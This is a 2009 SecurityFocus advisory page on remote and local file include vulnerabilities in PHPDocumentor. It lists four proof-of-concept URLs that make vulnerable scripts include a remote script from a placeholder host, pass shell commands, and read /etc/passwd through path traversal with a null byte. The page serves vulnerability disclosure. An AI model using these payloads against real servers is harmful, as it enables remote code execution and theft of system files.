Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPDocumentor Remote and Local File Include Vulnerabilities

Exploit code is not required.

The following proof of concept examples are available:
http://www.example.com/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?cmd=ls%20-la&FORUM[LIB]=http://www.example.com

http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=http://www.example.com/script.txt%00

http://www.example.com/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=../../../../../../../etc/passwd%00

http://www.example.com/[path_to_phpdocumentor]/docbuilder/file_dialog.php?cmd=ls%20-la&root_dir=http://www.example.com







 

Privacy Statement
Copyright 2009, SecurityFocus